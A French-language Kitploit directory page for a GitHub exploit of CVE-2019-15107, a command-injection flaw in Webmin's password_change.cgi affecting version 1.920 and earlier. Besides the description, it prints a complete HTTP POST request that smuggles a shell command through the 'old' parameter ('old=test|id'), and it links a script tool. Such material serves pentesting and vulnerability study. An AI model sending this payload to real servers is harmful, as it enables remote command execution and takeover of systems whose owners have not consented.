Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WebminRCE-EXP-CVE-2019-15107- — Vulnérabilité d'exécution de code à distance dans Webmin | Kitploit
Outils/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

Vulnérabilité d'exécution de code à distance dans Webmin

Voir le dépôt
35il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-15107: Exploit Modules Available for Remote Code Execution Vulnerability in Webmin

  1. Description de la vulnérabilité Webmin est un outil de gestion système puissant basé sur le Web, largement utilisé sur les systèmes Unix. En raison du processus de traitement des requêtes de Password_Change.cgi dans Webmin, le paramètre old présente une vulnérabilité d'injection de commandes qui peut être exploitée par des attaquants. Lorsque la fonction de réinitialisation de mot de passe Webmin est activée, un attaquant peut utiliser cette vulnérabilité pour exécuter des commandes arbitraires sur des systèmes vulnérables, obtenant ainsi un accès shell.

Versions concernées : Webmin 1.920 et versions antérieures

  1. Exploitation de la vulnérabilité Méthode 1 : Détection manuelle Accédez à la page et ignorez le certificat pour voir la page de connexion de Webmin. step 1

Envoyez le paquet de données suivant pour exécuter la commande id :

POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 step 2

Méthode 2 : Utilisation d'un script step 3

Télécharger l’outil